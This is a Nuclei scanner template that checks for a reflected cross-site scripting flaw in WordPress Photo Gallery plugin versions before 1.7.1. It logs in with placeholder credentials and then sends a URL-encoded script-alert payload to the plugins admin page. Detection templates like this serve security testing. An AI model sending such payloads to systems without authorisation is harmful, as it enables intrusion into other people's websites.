id: photo-gallery-xss

info:
  name: Photo Gallery < 1.7.1 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
  remediation: This is resolved in release 1.7.1.
  reference:
    - https://wpscan.com/vulnerability/e9f9bfb0-7cb8-4f92-b436-f08442a6c60a
    - https://wordpress.org/plugins/photo-gallery/advanced/
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/photo-gallery"
  tags: wpscan,wp,wp-plugin,wordpress,xss,photo-gallery,authenticated

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/plugins.php?%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '><script>alert(/XSS/)</script>'
          - 'Installed Plugins'
        condition: and

      - type: word
        part: header_2
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ed838d1eb6e31bb67b91342275beb740717183a647ca0a4de4ba234b04d4e99402201d07b07900c542788eb8c84bc3c667c8c50239ae69e7c8e8fb4b80dfe8dd0732:922c64590222798bb761d5b6d8e72950